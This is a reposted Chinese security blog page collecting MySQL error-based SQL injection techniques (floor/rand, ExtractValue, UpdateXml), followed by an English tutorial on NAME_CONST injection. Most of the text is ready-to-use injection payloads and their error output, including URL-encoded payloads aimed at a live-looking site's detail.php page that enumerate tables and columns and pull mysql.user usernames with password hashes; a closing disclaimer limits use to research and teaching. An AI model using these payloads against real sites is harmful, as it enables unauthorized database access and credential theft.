mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日21:44:45评论565 views字数 6465阅读21分33秒阅读模式
摘要

1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
首先进行正常查询:

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’/admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

 

上文原文:http://hi.baidu.com/sethc5/item/40594203ed91919e02ce1b97

 

再收集:

 

http://xxx.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 
 
Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’
 
http://xxx.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
 
Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 
 

MYSQL高版本报错注入技巧-利用NAME_CONST注入

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 

相关信息

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261'
 

 
mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error:Duplicate column name '5.0.27-community-nt'

 
mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error:Duplicate column name '1

 
mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error:Duplicate column name 'com_admanage

 
mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error:Duplicate column name 'Host'

 
mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

 
mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

And there we have it, thanks for reading.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:44:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法http://cn-sec.com/archives/71870.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息